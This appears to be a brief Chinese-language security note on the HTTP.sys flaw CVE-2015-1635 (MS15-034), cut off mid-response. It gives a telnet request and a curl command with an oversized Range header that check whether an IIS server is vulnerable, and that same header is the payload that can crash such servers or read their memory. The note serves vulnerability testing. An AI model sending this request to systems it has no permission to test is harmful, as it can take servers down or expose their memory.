HTTP.SYS远程代码执行漏洞测试
简介: 在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。 测试: 方法1: # telnet www.test.com 80 GET / HTTP/ 1.1 Host: stuff Range: bytes = 0 - 18446744073709551615 方法2: # curl -v www.test.com -H " Host: irrelevant " -H " Range: bytes=0-18446744073709551615 " 判断是否存在漏洞: 不存在该漏洞的响应包为: HTTP Error 400 . The request has an invalid header name. 存在漏洞的响应包为: < HTTP/ 1.1